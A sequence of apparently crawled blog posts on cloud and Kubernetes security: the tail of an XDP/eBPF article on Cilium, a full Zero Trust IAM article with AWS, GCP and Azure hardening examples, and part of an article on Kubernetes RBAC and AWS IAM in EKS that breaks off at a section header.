This is the architecture behind tools like Pro-NDS: the fast-path pattern matching (connection tracking, signature matching) happens at XDP before any kernel allocation. The enforcement action — which requires knowing which pod sent this — happens at TC using the metadata XDP already wrote.

From an operational standpoint, when you see two eBPF programs on the same interface (one XDP, one TC), this pipeline is the likely explanation. The bpftool net list output shows both:

bpftool net list
# xdpdrv id 44 on eth0       ← XDP classifier running at line rate
# tc ingress id 47 on eth0   ← TC enforcer reading XDP metadata

How Cilium Uses XDP

Not running Cilium? On EKS with aws-vpc-cni or GKE with kubenet, service forwarding uses iptables NAT rules and conntrack instead. You can see this with iptables -t nat -L -n on a node — look for the KUBE-SVC-* chains. Those chains are what XDP replaces in a Cilium cluster. This is why teams migrating from kube-proxy to Cilium report lower node CPU at high connection rates — it’s not magic, it’s hook placement.

On a Cilium node, XDP handles the load balancing path for ClusterIP services. When a packet arrives at the node destined for a ClusterIP:

  1. XDP program checks the destination IP against a BPF LRU hash map of known service VIPs
  2. On a match, it performs DNAT — rewriting the destination IP to a backend pod IP
  3. Returns XDP_TX or XDP_REDIRECT to forward directly

No iptables NAT rules. No conntrack state machine. No socket buffer allocation for the routing decision. The lookup is O(1) in a BPF hash map.

# See Cilium's XDP program on the node uplink
ip link show eth0 | grep xdp
# xdp  (attached, native mode)

# The XDP program details
bpftool prog show pinned /sys/fs/bpf/cilium/xdp

# Load time, instruction count, JIT-compiled size
bpftool prog show id $(bpftool net list | grep xdp | awk '{print $NF}')

At production scale — 500+ nodes, 50k+ services — removing iptables from the service forwarding path with XDP reduces per-node CPU utilization measurably. The effect is most visible on nodes handling high connection rates to cluster services.

Operational Inspection

# All XDP programs on all interfaces
bpftool net list

# Check XDP mode (native, generic, offloaded)
ip link show | grep xdp

# Per-interface stats — includes XDP drop/pass counters
cat /sys/class/net/eth0/statistics/rx_dropped

# XDP drop counters exposed via bpftool
bpftool map dump id <stats_map_id>

# Verify XDP is active and show program details
bpftool net show dev eth0

Common Mistakes

Mistake Impact Fix
Missing bounds check before pointer dereference Verifier rejects: “invalid mem access” Always check ptr + sizeof(*ptr) > data_end before use
Using generic XDP for performance testing Misleading numbers — sk_buff still allocated Test in native mode only; check ip link output for mode
Not handling non-IP traffic (ARP, IPv6, VLAN) ARP breaks, IPv6 drops, VLAN-tagged frames dropped Check eth->h_proto and return XDP_PASS for non-IP
XDP for egress or pod identity No socket context at XDP; XDP is ingress only Use TC egress for pod-identity-aware egress policy
Forgetting BPF_F_NO_PREALLOC on LPM trie Full memory allocated at map creation for all entries Always set this flag for sparse prefix tries
Blocking ARP by accident in a /24 blocklist Loss of layer-2 reachability within the blocked subnet Separate ARP handling before the IP blocklist check

Key Takeaways

  • XDP fires before sk_buff allocation — the earliest possible kernel hook for packet processing
  • Three modes: native (in-driver, full performance), generic (fallback, no perf gain), offloaded (NIC ASIC)
  • XDP context is raw packet bytes — no socket, no cgroup, no pod identity; handle non-IP traffic explicitly
  • Every pointer dereference requires a bounds check against data_end — the verifier enforces this
  • BPF_MAP_TYPE_LPM_TRIE is the right map for IP prefix blocklists — handles /32 hosts and CIDRs together
  • XDP metadata area enables coordination with TC programs — classify at XDP speed, enforce with pod context at TC

What’s Next

XDP handles ingress at the fastest possible point but has no visibility into which pod sent a packet. EP08 covers TC eBPF — the hook that fires after sk_buff allocation, where socket and cgroup context exist.

TC is how Cilium implements pod-to-pod network policy without iptables. It’s also where stale programs from failed Cilium upgrades leave ghost filters that cause intermittent packet drops. Knowing how TC programs chain — and how to find and remove stale ones — is a specific, concrete operational skill.

Next: TC eBPF — pod-level network policy without iptables

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

Reading Time: 10 minutes

Meta Description: Understand how zero trust access in the cloud works end to end — continuous verification, least privilege enforcement, and the full policy evaluation loop.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC FederationKubernetes RBAC and AWS IAMZero Trust Access in the Cloud


TL;DR

  • Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
  • Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
  • JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
  • Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
  • Continuous session validation re-evaluates signals throughout the session — device falls out of compliance, sessions revoke in minutes, not at expiry
  • The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode is how those principles translate to concrete practices — building on everything we’ve covered in this series.


The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There’s no concept of “once authenticated, trusted until logout.” In cloud IAM, this already exists natively. Every API call is authenticated and authorized independently. The challenge is extending this model to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere — a compromised credential expires, not “after the session times out in 8 hours”

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

  • Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
  • Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
  • Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: require MFA for all IAM operations — enforce via SCP across the org
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/AWSServiceRole*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}
# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configures in Entra ID Conditional Access portal)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]
# AWS Verified Access: identity + device posture for application access — no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Attach identity trust provider (Okta OIDC)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --oidc-options IssuerURL=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Attach device trust provider (Jamf, Intune, or CrowdStrike)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --device-options TenantId=JAMF_TENANT_ID

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then automatically removed
# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.

// GCP: bind IAM access to an Access Context Manager access level
// Access level enforces device compliance — if device falls out of compliance,
// the access level is no longer satisfied and requests fail immediately
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.auth.access_levels.exists(x, x == 'accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device'),title=Compliant device required"

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}
# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD — fail the build if any policy statement has wildcard actions
package iam.policy

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action — not allowed", [i])
}

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  endswith(input.Statement[i].Action, "Delete")
  msg := sprintf("Statement %d allows Delete on all resources — requires specific ARN", [i])
}

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must have: LoggingEnabled=true, IsMultiRegionTrail=true, IncludeGlobalServiceEvents=true

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[] | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

Framework Reference What It Covers Here
CISSP Domain 5 — IAM Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust
CISSP Domain 1 — Security & Risk Management Assume breach as a risk management posture; blast radius minimization through least privilege
CISSP Domain 7 — Security Operations Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust
ISO 27001:2022 5.15 Access control Zero Trust access policy: verify explicitly, least privilege, assume breach
ISO 27001:2022 8.16 Monitoring activities Continuous session validation and universal audit trail — all authorization decisions logged
ISO 27001:2022 8.20 Networks security Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop
ISO 27001:2022 5.23 Information security for cloud services Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure
SOC 2 CC6.1 Zero Trust logical access controls — JIT, device posture, context-aware authorization
SOC 2 CC6.7 Continuous session validation and transmission controls across all system components
SOC 2 CC7.1 Threat detection through universal audit trails and anomaly-triggered automated response
SOC 2 CC7.2 Incident response — automated revocation and session termination on anomaly detection

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

Level Where You Are What to Build Next
1 — Initial Some MFA; static credentials for machines; no centralized IdP Eliminate machine static keys → workload identity
2 — Managed Centralized IdP; SSO for most systems; some MFA enforcement Close SSO gaps; enforce MFA everywhere; federate to cloud
3 — Defined Least privilege being enforced; audit tooling in use; JIT for some privileged access Expand JIT; policy-as-code in CI/CD; quarterly access reviews
4 — Contextual Device posture in access decisions; conditional access policies Continuous session evaluation; automated anomaly response
5 — Optimizing Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation Refine and maintain — Zero Trust is never “done”

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.


The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

  1. Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.

  2. Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.

  3. Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.

  4. Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.

  5. Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.

  6. JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.

  7. IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.

  8. Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.

  9. Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.

  10. Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.


Series Complete

This series covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

Episode Topic The Core Lesson
EP01 What is IAM? Access management is deny-by-default; every grant is an explicit decision
EP02 AuthN vs AuthZ Two separate gates; passing one doesn’t open the other
EP03 Roles, Policies, Permissions Structure prevents drift; wildcards accumulate into exposure
EP04 AWS IAM Deep Dive Trust policies and permission policies are both required; the evaluation chain has six layers
EP05 GCP IAM Deep Dive Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern
EP06 Azure RBAC and Entra ID Two separate authorization planes; managed identities are the right model for workloads
EP07 Workload Identity Static credentials for machines are solvable at the root; OIDC token exchange replaces them
EP08 IAM Attack Paths The attack chain runs through IAM; iam:PassRole and its equivalents are privilege escalation primitives
EP09 Least Privilege Auditing 5% utilization is the average; the 95% excess is attack surface — and it’s measurable
EP10 Federation, OIDC, SAML The IdP is the trust anchor; everything downstream is bounded by its security
EP11 Kubernetes RBAC Two separate IAM layers; both must be secured; cluster-admin is the first thing to audit
EP12 Zero Trust IAM Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s what this series has been building toward.


The full series is at linuxcent.com/cloud-iam-series. If you found it useful, the best thing you can do is subscribe — the next series covers eBPF: what’s actually running in kernel space when Cilium, Falco, and Tetragon are doing their work.

Subscribe → linuxcent.com/subscribe

Kubernetes RBAC and AWS IAM: The Two-Layer Access Model for EKS

Reading Time: 9 minutes

Meta Description: Understand how Kubernetes RBAC and AWS IAM interact in EKS — map the two-layer access model and debug permission failures across both control planes.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC FederationKubernetes RBAC and AWS IAM


TL;DR

  • Kubernetes RBAC and cloud IAM are separate authorization layers — strong cloud IAM with weak Kubernetes RBAC is still a vulnerable cluster
  • cluster-admin ClusterRoleBindings are the first thing to audit — a compromised pod with cluster-admin controls the entire cluster
  • Disable automountServiceAccountToken on pods that don’t call the Kubernetes API — most application pods don’t need it mounted
  • Use OIDC for human access instead of X.509 client certificates — client certs cannot be revoked without rotating the CA
  • Bind groups from IdP, not individual usernames — revocation propagates automatically when someone leaves
  • A ServiceAccount that can create pods or create rolebindings is a privilege escalation path: the same class of risk as iam:PassRole

The Big Picture

  TWO AUTHORIZATION LAYERS — NEITHER COMPENSATES FOR THE OTHER

  ┌─────────────────────────────────────────────────────────────────┐
  │  CLOUD IAM LAYER  (AWS IAM / GCP IAM / Azure RBAC)             │
  │  Controls: S3, DynamoDB, Lambda, RDS, cloud services           │
  │  Human: federated identity from IdP (SAML / OIDC)             │
  │  Machine: IRSA annotation → IAM role / GKE WI / AKS WI        │
  │  Audit: CloudTrail, GCP Audit Logs, Azure Monitor              │
  └─────────────────────────────────────────────────────────────────┘
           ↕ separate systems — no inheritance in either direction
  ┌─────────────────────────────────────────────────────────────────┐
  │  KUBERNETES RBAC LAYER  (within the cluster)                   │
  │  Controls: pods, secrets, deployments, configmaps, namespaces  │
  │  Human: OIDC groups → ClusterRoleBinding (or RoleBinding)      │
  │  Machine: ServiceAccount → Role / ClusterRole                  │
  │  Audit: kube-apiserver audit log                               │
  └─────────────────────────────────────────────────────────────────┘

  Attack path: exploit app pod → SA has cluster-admin → own the cluster
  Audit finding: cluster-admin on app SA, regardless of cloud IAM posture

Introduction

I spent a long time in Kubernetes environments thinking cloud IAM and Kubernetes RBAC were related in a way that meant securing one partially covered the other. They don’t. They’re separate authorization systems that happen to share infrastructure.

The moment this crystallized for me: I was auditing an EKS cluster for a fintech company. Their AWS IAM posture was actually quite good — least privilege roles, no wildcard policies, SCPs in place at the org level. I was about to give them a clean bill of health when I ran one command:

kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | {name:.metadata.name, subjects:.subjects}'

The output showed five ClusterRoleBindings to cluster-admin. Two of them bound it to service accounts in production namespaces. One of those service accounts was used by an application that processed customer transactions.

cluster-admin in Kubernetes is the equivalent of AdministratorAccess in AWS. An attacker who compromises a pod running as that service account doesn’t just have access to the application’s data. They have control of the entire cluster: reading every secret in every namespace, deploying arbitrary workloads, modifying RBAC bindings to create persistence.

None of this showed up in the AWS IAM audit. AWS IAM and Kubernetes RBAC are separate systems. Securing one tells you nothing about the other.


Kubernetes RBAC Architecture

Kubernetes RBAC works with four object types:

Object Scope What It Does
Role Single namespace Defines permissions within one namespace
ClusterRole Cluster-wide Permissions across all namespaces, or for non-namespaced resources
RoleBinding Single namespace Binds a Role (or ClusterRole) to subjects, scoped to one namespace
ClusterRoleBinding Cluster-wide Binds a ClusterRole to subjects with cluster-wide scope

Subjects — the identities that receive the binding — are:
User: an external identity (Kubernetes has no native user objects; users come from the authenticator)
Group: a group of external identities
ServiceAccount: a Kubernetes-native machine identity, namespaced

The scoping matters. A ClusterRole defines what permissions exist. A RoleBinding applies that ClusterRole within a single namespace. A ClusterRoleBinding applies it everywhere. The same permissions, dramatically different blast radius.


Roles and ClusterRoles

# Role: read pods and their logs — scoped to the default namespace only
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]          # "" = core API group (pods, secrets, configmaps, etc.)
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]
# ClusterRole: manage Deployments across all namespaces
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: deployment-manager
rules:
- apiGroups: ["apps"]
  resources: ["deployments", "replicasets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]

The verbs map to HTTP methods against the Kubernetes API: get reads a specific resource, list returns a collection, watch streams changes, create/update/patch/delete are mutations.

One that consistently surprises people: list on secrets returns secret values in some Kubernetes versions and configurations. You might think “list” is just metadata, but listing secrets can include their data. If a service account needs to check whether a secret exists, grant get on the specific secret name. Avoid list on the secrets resource.

The Wildcard Risk

# This is effectively cluster-admin in the default namespace — avoid
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

Any * in RBAC rules is an audit finding. In practice I find wildcards most often in:
– Operator and controller service accounts (understandable, but worth reviewing)
– “Temporary” RBAC that became permanent
– Developer tooling given cluster-admin “because it was easier”

Run this to find all ClusterRoles with wildcard verbs:

kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[] == "*") | .metadata.name'

Bindings — Connecting Identities to Roles

# RoleBinding: alice can read pods in the default namespace
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: alice-pod-reader
  namespace: default
subjects:
- kind: User
  name: [email protected]
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
# ClusterRoleBinding: Prometheus can read cluster-wide (monitoring use case)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-cluster-reader
subjects:
- kind: ServiceAccount
  name: prometheus
  namespace: monitoring
roleRef:
  kind: ClusterRole
  name: view
  apiGroup: rbac.authorization.k8s.io

An important pattern: a RoleBinding can reference a ClusterRole. This lets you define a role once at the cluster level (the ClusterRole) and bind it within specific namespaces through RoleBindings. The permissions are still scoped to the namespace where the RoleBinding lives. This is the right pattern for shared role definitions — define the permission set once, instantiate it with appropriate scope.

Default to RoleBinding over ClusterRoleBinding for namespace-scoped work. ClusterRoleBinding should be reserved for genuinely cluster-wide operations: monitoring agents, network plugins, cluster operators, security tooling.


Service Accounts — The Machine Identity in Kubernetes

Every pod in Kubernetes runs as a service account. If you don’t specify one, it uses the default service account in the pod’s namespace.

The default service account is where many RBAC misconfigurations accumulate. When someone creates a RoleBinding without thinking about which SA to use, they often bind the permission to default. Now every pod in that namespace that doesn’t explicitly set a service account — including pods deployed by developers who aren’t thinking about RBAC — inherits that binding.

# Create a dedicated SA for each application
kubectl create serviceaccount app-backend -n production

# Check what any SA can currently do — use this in every audit
kubectl auth can-i --list --as=system:serviceaccount:production:app-backend -n production

# Check a specific action
kubectl auth can-i get secrets \
  --as=system:serviceaccount:production:app-backend -n production

kubectl auth can-i create pods \
  --as=system:serviceaccount:production:app-backend -n production

Disable Auto-Mounting the SA Token

By default, Kubernetes mounts the service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. A pod that doesn’t need to call the Kubernetes API doesn’t need this token. Having it mounted increases the blast radius if the pod is compromised — the token can be used to call the K8s API with whatever RBAC permissions the SA has.

# Disable at the pod level
apiVersion: v1
kind: Pod
spec:
  automountServiceAccountToken: false
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest

# Or at the service account level (applies to all pods using this SA)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
automountServiceAccountToken: false

For most application pods — anything that isn’t a Kubernetes operator, controller, or management tool — the K8s API token is unnecessary. Disable it.


Human Access to Kubernetes — Get Off Client Certificates

Kubernetes doesn’t manage human users natively. Authentication is delegated to an external mechanism. The most common approaches:

Method Notes
X.509 client certificates Common for initial cluster setup; credentials are embedded in kubeconfig; cannot be revoked without revoking the CA
Static bearer tokens Long-lived; avoid
OIDC via external IdP Preferred for human access — supports SSO, MFA, and revocation via IdP
Webhook auth Flexible, requires custom infrastructure

X.509 certificates are the bootstrap pattern. Every managed Kubernetes offering generates an admin kubeconfig with a client certificate. The problem: you can’t revoke individual certificates without rotating the CA. If you’re giving human engineers access via client certificates, someone leaving doesn’t actually lose cluster access until the certificate expires.

OIDC is the right model. Configure the kube-apiserver to accept JWTs from your IdP, bind RBAC permissions to groups from the IdP, and revocation becomes “remove from IdP group” rather than “hope the certificate expires soon”:

# kube-apiserver flags for OIDC (managed clusters configure this via provider settings)
--oidc-issuer-url=https://accounts.google.com
--oidc-client-id=my-cluster-client-id
--oidc-username-claim=email
--oidc-groups-claim=groups
--oidc-groups-prefix=oidc:
# User's kubeconfig — uses an exec plugin to fetch an OIDC token
users:
- name: alice
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: kubectl-oidc-login
      args:
        - get-token
        - --oidc-issuer-url=https://dex.company.com
        - --oidc-client-id=kubernetes

With managed clusters:

# EKS: add IAM role as a cluster access entry (replaces the aws-auth ConfigMap)
aws eks create-access-entry \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --type STANDARD

aws eks associate-access-policy \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \
  --access-scope type=namespace,namespaces=production,staging

# GKE: get credentials; IAM roles map to cluster permissions
gcloud container clusters get-credentials my-cluster --region us-central1
# roles/container.developer → edit permissions
# But: use ClusterRoleBindings for fine-grained control rather than relying on GCP IAM roles

# AKS: bind Entra ID groups to Kubernetes RBAC
az aks get-credentials --name my-aks --resource-group rg-prod
kubectl create clusterrolebinding dev-team-view \
  --clusterrole=view \
  --group=ENTRA_GROUP_OBJECT_ID

Cloud IAM + Kubernetes RBAC: The Integration Points

EKS Pod Identity / IRSA (revisited)

